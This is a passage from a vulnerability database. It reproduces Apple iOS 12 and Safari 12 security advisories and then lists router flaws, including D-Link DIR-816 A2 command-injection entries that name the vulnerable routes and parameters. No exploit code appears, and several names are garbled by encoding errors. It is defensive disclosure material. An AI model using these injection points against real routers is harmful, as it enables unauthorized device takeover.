Impact: An application may be able to gain elevated privileges
Description: A memory corruption issue was addressed with improved
input validation.
CVE-2018-4414: The UK's National Cyber Security Centre (NCSC)
Entry added October 30, 2018
CoreMedia
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An app may be able to learn information about the current
camera view before being granted camera access
Description: A permissions issue existed.
CVE-2018-4356: an anonymous researcher
CoreText
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing a maliciously crafted text file may lead to
arbitrary code execution
Description: A use after free issue was addressed with improved
memory management.
CVE-2018-4347: an anonymous researcher
Entry added October 30, 2018
Crash Reporter
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to read restricted memory
Description: A validation issue was addressed with improved input
sanitization.
CVE-2018-4333: Brandon Azad
Grand Central Dispatch
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4426: Brandon Azad
Entry added October 30, 2018
Heimdal
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4331: Brandon Azad
CVE-2018-4332: Brandon Azad
CVE-2018-4343: Brandon Azad
Entry added October 30, 2018
iBooks
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Parsing a maliciously crafted iBooks file may lead to
disclosure of user information
Description: A configuration issue was addressed with additional
restrictions.
CVE-2018-4355: evi1m0 of bilibili security team
Entry added October 30, 2018
IOHIDFamily
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to execute arbitrary code
with kernel privileges
Description: A memory corruption issue was addressed with improved
input validation
CVE-2018-4408: Ian Beer of Google Project Zero
Entry added October 30, 2018
IOKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to break out of its
sandbox
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4341: Ian Beer of Google Project Zero
CVE-2018-4354: Ian Beer of Google Project Zero
Entry added October 30, 2018
IOKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
state management.
CVE-2018-4383: Apple
Entry added October 30, 2018
IOMobileFrameBuffer
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to read restricted memory
Description: A validation issue was addressed with improved input
sanitization.
CVE-2018-4335: Brandon Azad
IOUserEthernet
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4401: Apple
Entry added October 30, 2018
iTunes Store
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An attacker in a privileged network position may be able to
spoof password prompts in the iTunes Store
Description: An input validation issue was addressed with improved
input validation.
CVE-2018-4305: Jerry Decime
Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to leak sensitive user
information
Description: An access issue existed with privileged API calls.
CVE-2018-4399: Fabiano Anemone (@anoane)
Entry added October 30, 2018
Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to read restricted memory
Description: An input validation issue existed in the kernel.
CVE-2018-4363: Ian Beer of Google Project Zero
Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An attacker in a privileged network position may be able to
execute arbitrary code
Description: A memory corruption issue was addressed with improved
validation.
CVE-2018-4407: Kevin Backhouse of Semmle Ltd.
Entry added October 30, 2018
Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4336: Brandon Azad
CVE-2018-4337: Ian Beer of Google Project Zero
CVE-2018-4340: Mohamed Ghannam (@_simo36)
CVE-2018-4344: The UK's National Cyber Security Centre (NCSC)
CVE-2018-4425: cc working with Trend Micro's Zero Day Initiative,
Juwei Lin (@panicaII) of Trend Micro working with Trend Micro's Zero
Day Initiative
Entry added October 30, 2018
mDNSOffloadUserClient
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4326: an anonymous researcher working with Trend Micro's
Zero Day Initiative, Zhuo Liang of Qihoo 360 Nirvan Team
Entry added October 30, 2018
MediaRemote
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A sandboxed process may be able to circumvent sandbox
restrictions
Description: An access issue was addressed with additional sandbox
restrictions.
CVE-2018-4310: CodeColorist of Ant-Financial LightYear Labs
Entry added October 30, 2018
Messages
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local user may be able to discover a user's deleted
messages
Description: A consistency issue existed in the handling of
application snapshots.
CVE-2018-4313: 11 anonymous researchers, David Scott, Enes Mert
Ulu of Abdullah MA1/4rAide AzA1/4nenek Anadolu Lisesi -
Ankara/TA1/4rkiye, Mehmet Ferit DaAtan of Van YA1/4zA1/4ncA1/4 YA+-l
University, Metin Altug Karakaya of Kaliptus Medical Organization,
Vinodh Swami of Western Governor's University (WGU)
Notes
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local user may be able to discover a user's deleted notes
Description: A consistency issue existed in the handling of
application snapshots.
CVE-2018-4352: Utku Altinkaynak
Safari
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local user may be able to discover websites a user has
visited
Description: A consistency issue existed in the handling of
application snapshots.
CVE-2018-4313: 11 anonymous researchers, David Scott, Enes Mert
Ulu of Abdullah MA1/4rAide AzA1/4nenek Anadolu Lisesi -
Ankara/TA1/4rkiye, Mehmet Ferit DaAtan of Van YA1/4zA1/4ncA1/4 YA+-l
University, Metin Altug Karakaya of Kaliptus Medical Organization,
Vinodh Swami of Western Governor's University (WGU)
Safari
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A user may be unable to delete browsing history items
Description: Clearing a history item may not clear visits with
redirect chains.
CVE-2018-4329: Hugo S. Diaz (coldpointblue)
SafariViewController
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Visiting a malicious website may lead to address bar spoofing
Description: An inconsistent user interface issue was addressed with
improved state management.
CVE-2018-4362: Jun Kokatsu (@shhnjk)
Security
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious website may be able to exfiltrate autofilled data
in Safari
Description: A logic issue was addressed with improved state
management.
CVE-2018-4307: Rafay Baloch of Pakistan Telecommunications Authority
Security
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local user may be able to cause a denial of service
Description: This issue was addressed with improved checks.
CVE-2018-4395: Patrick Wardle of Digita Security
Entry added October 30, 2018
Security
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An attacker may be able to exploit weaknesses in the RC4
cryptographic algorithm
Description: This issue was addressed by removing RC4.
CVE-2016-1777: Pepi Zawodsky
Status Bar
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A person with physical access to an iOS device may be able to
determine the last used app from the lock screen
Description: A logic issue was addressed with improved restrictions.
CVE-2018-4325: Brian Adeloye
Symptom Framework
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to read restricted memory
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2018-4203: Bruno Keith (@bkth_) working with Trend Micro's Zero
Day Initiative
Entry added October 30, 2018
Text
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing a maliciously crafted text file may lead to a
denial of service
Description: A denial of service issue was addressed with improved
validation.
CVE-2018-4304: jianan.huang (@Sevck)
Entry added October 30, 2018
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory corruption issue was addressed with improved
state management.
CVE-2018-4316: crixer, Hanming Zhang (@4shitak4) of Qihoo 360 Vulcan
Team
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: Multiple memory corruption issues were addressed with
improved memory handling.
CVE-2018-4299: Samuel GroI2 (saelo) working with Trend Micro's Zero
Day Initiative
CVE-2018-4323: Ivan Fratric of Google Project Zero
CVE-2018-4328: Ivan Fratric of Google Project Zero
CVE-2018-4358: @phoenhex team (@bkth_ @5aelo @_niklasb) working with
Trend Micro's Zero Day Initiative
CVE-2018-4359: Samuel GroA (@5aelo)
CVE-2018-4360: William Bowling (@wcbowling)
Entry added October 30, 2018
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious website may cause unexepected cross-origin
behavior
Description: A cross-origin issue existed with "iframe" elements.
This was addressed with improved tracking of security origins.
CVE-2018-4319: John Pettitt of Google
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A use after free issue was addressed with improved
memory management.
CVE-2018-4197: Ivan Fratric of Google Project Zero
CVE-2018-4306: Ivan Fratric of Google Project Zero
CVE-2018-4312: Ivan Fratric of Google Project Zero
CVE-2018-4314: Ivan Fratric of Google Project Zero
CVE-2018-4315: Ivan Fratric of Google Project Zero
CVE-2018-4317: Ivan Fratric of Google Project Zero
CVE-2018-4318: Ivan Fratric of Google Project Zero
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious website may exfiltrate image data cross-origin
Description: A cross-site scripting issue existed in Safari.
CVE-2018-4345: an anonymous researcher
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Unexpected interaction causes an ASSERT failure
Description: A memory corruption issue was addressed with improved
validation.
CVE-2018-4191: found by OSS-Fuzz
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Cross-origin SecurityErrors includes the accessed frame's
origin
Description: The issue was addressed by removing origin information.
CVE-2018-4311: Erling Alf Ellingsen (@steike)
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious website may be able to execute scripts in the
context of another website
Description: A cross-site scripting issue existed in Safari.
CVE-2018-4309: an anonymous researcher working with Trend Micro's
Zero Day Initiative
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Unexpected interaction causes an ASSERT failure
Description: A memory consumption issue was addressed with improved
memory handling.
CVE-2018-4361: found by OSS-Fuzz
Additional recognition
APFS
We would like to acknowledge Umang Raghuvanshi for their assistance.
Assets
We would like to acknowledge Brandon Azad for their assistance.
configd
We would like to acknowledge Sabri Haddouche (@pwnsdx) of Wire Swiss
GmbH for their assistance.
Core Data
We would like to acknowledge Andreas Kurtz (@aykay) of NESO Security
Labs GmbH for their assistance.
CoreSymbolication
We would like to acknowledge Brandon Azad for their assistance.
Exchange ActiveSync
We would like to acknowledge Jesse Thompson of University of
Wisconsin-Madison for their assistance.
Feedback Assistant
We would like to acknowledge Marco Grassi (@marcograss) of KeenLab
(@keen_lab) Tencent working with Trend Micro's Zero Day Initiative
for their assistance.
Kernel
We would like to acknowledge Brandon Azad for their assistance.
Mail
We would like to acknowledge Alessandro Avagliano of Rocket Internet
SE, Gunnar Diepenbruck,
and Zbyszek A>>A3Akiewski for their assistance.
MediaRemote
We would like to acknowledge Brandon Azad for their assistance.
Quick Look
We would like to acknowledge lokihardt of Google Project Zero for
their assistance.
Safari
We would like to acknowledge Marcel Manz of SIMM-Comm GmbH and Vlad
Galbin for their assistance.
Sandbox Profiles
We would like to acknowledge Tencent Keen Security Lab working with
Trend Micro's Zero Day Initiative for their assistance.
Security
We would like to acknowledge Christoph Sinai, Daniel Dudek
(@dannysapples) of The Irish Times and Filip KlubiAka (@lemoncloak)
of ADAPT Centre, Dublin Institute of Technology, Istvan Csanady of
Shapr3D, Omar Barkawi of ITG Software, Inc., Phil Caleno, Wilson
Ding, and an anonymous researcher for their assistance.
SQLite
We would like to acknowledge Andreas Kurtz (@aykay) of NESO Security
Labs GmbH for their assistance.
Status Bar
We would like to acknowledge Ju Zhu of Meituan and Moony Li and
Lilang Wu of Trend Micro for their assistance.
WebKit
We would like to acknowledge Cary Hartline, Hanming Zhang from 360
Vuclan team, Tencent Keen Security Lab working with Trend Micro's
Zero Day Initiative, and Zach Malone of CA Technologies for their
assistance.
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from https://www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About.
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
iQJdBAEBCABHFiEEDNXJVNCJJEAVmJdZeC9tht7TK3EFAlvYkgYpHHByb2R1Y3Qt
c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQeC9tht7TK3HbuA//
ZOEwXUyLVS3SqfEjU3MRUoTp1x+Ow+fd5co9B6v7bY+Ebc2KmSZjpPuNPjouRHmf
RbWpZ0Mc52NYm+OdYqPu/Tg94wRi6tlrYusk6GngVH4IBER4TqiFrLNSzAjXL0xP
qWv3JQcAIFNbNWpSEzDzEbuq85q4BIuP/+v2LpTc1ZWqIYt9TQHxUpyjoTXZvQhL
8L9ZM/dj8BC+m713LeC/KzveaDpaqnVJUDbgUkzRyFfFqOJt+hlaTS8yMUM3G+TX
cblL8bvFNIxtUrt4Rf2TwDRVxUZIw/aFK2APmxVZ44UAT+2o+WFxBkHRXQiZc4Lk
OaTzzkocdZu4q4MibrxELBWtW46AcGMqQKUpFZ6GR+4U2c1ICRwKnjQTn0iY7mg7
d+M+bTx8T2knwV7lSwvnHz79rysvOuCF3QCAZ4tW4PvLHWSZ0TpJho8z23PLHFQd
J3cOYPby6SM9YP6SBISX5OI8xnvr1XIAPIBnOy0ScaMFsu0Er8j1hvbF1fXiaYOJ
CSUUXR2th3jPW0g9L0j4vWGURG1h0psIN2MxTSHbmm4KXBAYngZ0wDOeJMUe8YMy
IG0UBDqKNh8lzKHcc4aYA1WyaNsqbgbngBqDATp/XyWRzd+Py/U06MVuIaV095Rv
s9WW67M1kLHy4BeutXt+xLBp9AugI+gU53uysxcnBx4=
=dGPm
-----END PGP SIGNATURE-----
| VAR-201904-0754 | CVE-2018-4195 | Safari User interface mismatch vulnerability |
CVSS V2: 4.3 CVSS V3: 6.5 Severity: MEDIUM |
An inconsistent user interface issue was addressed with improved state management. This issue affected versions prior to Safari 12. Apple Safari is prone to a security-bypass vulnerability.
Attackers can exploit this issue to bypass certain security restrictions and perform unauthorized actions. Apple Safari is a web browser developed by Apple (Apple), and is the default browser included with MacOSX and iOS operating systems. Attackers can use malicious websites to exploit this vulnerability to forge user interfaces. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2018-9-24-3 Additional information for
APPLE-SA-2018-9-17-4 Safari 12
Safari 12 addresses the following:
Safari
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS
Mojave 10.14
Impact: A user may be unable to delete browsing history items
Description: Clearing a history item may not clear visits with
redirect chains.
CVE-2018-4329: Hugo S.
CVE-2018-4195: xisigr of Tencent's Xuanwu Lab (www.tencent.com)
Security
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS
Mojave 10.14
Impact: A malicious website may be able to exfiltrate autofilled data
in Safari
Description: A logic issue was addressed with improved state
management.
CVE-2018-4307: Rafay Baloch of Pakistan Telecommunications Authority
WebKit
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS
Mojave 10.14
Impact: Unexpected interaction causes an ASSERT failure
Description: A memory corruption issue was addressed with improved
validation.
CVE-2018-4191: found by OSS-Fuzz
Entry added September 24, 2018
WebKit
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS
Mojave 10.14
Impact: Cross-origin SecurityErrors includes the accessed frame's
origin
Description: The issue was addressed by removing origin information.
CVE-2018-4311: Erling Alf Ellingsen (@steike)
Entry added September 24, 2018
WebKit
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS
Mojave 10.14
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory corruption issue was addressed with improved
state management.
CVE-2018-4316: crixer, Hanming Zhang (@4shitak4) of Qihoo 360 Vulcan
Team
Entry added September 24, 2018
WebKit
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS
Mojave 10.14
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: Multiple memory corruption issues were addressed with
improved memory handling.
CVE-2018-4299: Samuel GroI2 (saelo) working with Trend Micro's Zero
Day Initiative
CVE-2018-4323: Ivan Fratric of Google Project Zero
CVE-2018-4328: Ivan Fratric of Google Project Zero
CVE-2018-4358: @phoenhex team (@bkth_ @5aelo @_niklasb) working with
Trend Micro's Zero Day Initiative
CVE-2018-4359: Samuel GroA (@5aelo)
Entry added September 24, 2018
WebKit
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS
Mojave 10.14
Impact: A malicious website may cause unexepected cross-origin
behavior
Description: A cross-origin issue existed with "iframe" elements.
This was addressed with improved tracking of security origins.
CVE-2018-4319: John Pettitt of Google
Entry added September 24, 2018
WebKit
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS
Mojave 10.14
Impact: A malicious website may be able to execute scripts in the
context of another website
Description: A cross-site scripting issue existed in Safari.
CVE-2018-4309: an anonymous researcher working with Trend Micro's
Zero Day Initiative
Entry added September 24, 2018
WebKit
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS
Mojave 10.14
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A use after free issue was addressed with improved
memory management.
CVE-2018-4197: Ivan Fratric of Google Project Zero
CVE-2018-4306: Ivan Fratric of Google Project Zero
CVE-2018-4312: Ivan Fratric of Google Project Zero
CVE-2018-4314: Ivan Fratric of Google Project Zero
CVE-2018-4315: Ivan Fratric of Google Project Zero
CVE-2018-4317: Ivan Fratric of Google Project Zero
CVE-2018-4318: Ivan Fratric of Google Project Zero
Entry added September 24, 2018
WebKit
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS
Mojave 10.14
Impact: A malicious website may exfiltrate image data cross-origin
Description: A cross-site scripting issue existed in Safari.
CVE-2018-4345: an anonymous researcher
Entry added September 24, 2018
WebKit
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS
Mojave 10.14
Impact: Unexpected interaction causes an ASSERT failure
Description: A memory consumption issue was addressed with improved
memory handling.
CVE-2018-4361: found by Google OSS-Fuzz
Entry added September 24, 2018
Additional recognition
WebKit
We would like to acknowledge Cary Hartline, Hanming Zhang from 360
Vuclan team, Tencent Keen Security Lab working with Trend Micro's
Zero Day Initiative, and Zach Malone of CA Technologies for their
assistance.
Installation note:
Safari 12 may be obtained from the Mac App Store.
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEDNXJVNCJJEAVmJdZeC9tht7TK3EFAlupFUIACgkQeC9tht7T
K3EOzBAAr4Kr9hZVKV603mOTE9cq6boEBYJLYJUN2/VjLzBPYWYr/e8tPg0P1EWr
i67b/0pWifR6A73F53oCxMzdumfwC4by2n106ABrx5KPYmbz5YBk8X/YEEWokBdK
zK/AJpQo768pTUIxlVuhIOsCLOieMRX3kiPWIg10WeIEggEnyavK9/emNyUu08GV
AXviCAz2vohBgG0pAvgKt2HD/yTxG2n+gdP9krOT9mMh0aH1tTlZ8107cF2bTWwv
yZw9LSCELre6cKOx4iDaY+vpPWGXwI+8+6hXYqKjNBomgJhLeQVqIdBo29IM0HTO
FZcyrQ5djoNDl8ZfGUAwFtyDhD4Fmdb/JyDdvLXME/GL2fPWG8hqDS5EGU/cNIus
ugQv/zsm6pXqLWt+sxbP5lU4Uuwfkw4H7HwwBxoE04ufGfxurEBgTIIQn+KwYg9J
ODrdoqsIDThOtqQHxzp0//+rs0hg49jGm4P8eSG86Oycoyw/Q9/pzCKeQGazfyfF
cTNX3wsZA84RVbHLVWbp0ZnYhVrH1iL61ipzH2hDTUbjelvv4u4pN6flIM6Kw9uN
J5bYuFOXzv61bxMe8fdAlZixqFXqJ5oNBTZOdaicZEKmfRTTh4p1BLTWcFSRbp7K
wCXqHSwmD7RjGr0Qbr/CvJFb/+kOrzQIHX7sCR6ZIusZPLpTYXI=
=4ySP
-----END PGP SIGNATURE-----
| VAR-201809-1333 | No CVE | High Password Network Firmware Router Has Weak Password Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Shanghai Guoyun Information Technology Co., Ltd. is a provider of intelligent network products and services.
A high-level network firmware router has a weak password vulnerability. Allow attackers to brute force account passwords, log in to the system, and obtain sensitive information.
| VAR-201809-0769 | CVE-2018-17068 | D-Link DIR-816 A2 Command injection vulnerabilities in devices |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
An issue was discovered on D-Link DIR-816 A2 1.10 B05 devices. An HTTP request parameter is used in command string construction in the handler function of the /goform/Diagnosis route. This could lead to command injection via shell metacharacters in the sendNum parameter. D-Link DIR-816 A2 The device contains a command injection vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. D-LinkDIR-816A2 is a wireless router product of D-Link. There is a command injection vulnerability in D-LinkDIR-816A21.10B05. This vulnerability is caused by the program using the 'sendNum' parameter value when building the 'ping-c%s...' command
| VAR-201809-0767 | CVE-2018-17066 | D-Link DIR-816 A2 Command injection vulnerability in devices |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
An issue was discovered on D-Link DIR-816 A2 1.10 B05 devices. An HTTP request parameter is used in command string construction in the handler function of the /goform/form2systime.cgi route. This could lead to command injection via shell metacharacters in the datetime parameter. D-Link DIR-816 A2 The device contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDIR-816 is a home router product from Friends of the company. A command injection vulnerability exists in D-LinkDIR-816A21.10B05. This vulnerability is caused by the program using the \342\200\230datetime\342\200\231 parameter value to construct the \342\200\230date-s\342\200\235%s\342\200\235 command, which can be exploited by an attacker
| VAR-201809-0765 | CVE-2018-17064 | D-Link DIR-816 A2 Command injection vulnerability in devices |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
An issue was discovered on D-Link DIR-816 A2 1.10 B05 devices. An HTTP request parameter is used in command string construction within the handler function of the /goform/sylogapply route. This could lead to command injection via the syslogIp parameter after /goform/clearlog is invoked. D-Link DIR-816 A2 The device contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDIR-816 is a home router product from Friends of the company. A command injection vulnerability exists in D-LinkDIR-816A21.10B05, which is caused by a program using HTTP requests to build commands that an attacker can use to inject commands. The /goform/sylogapply in D-Link DIR-816 A2 version 1.10 B05 has an operating system command injection vulnerability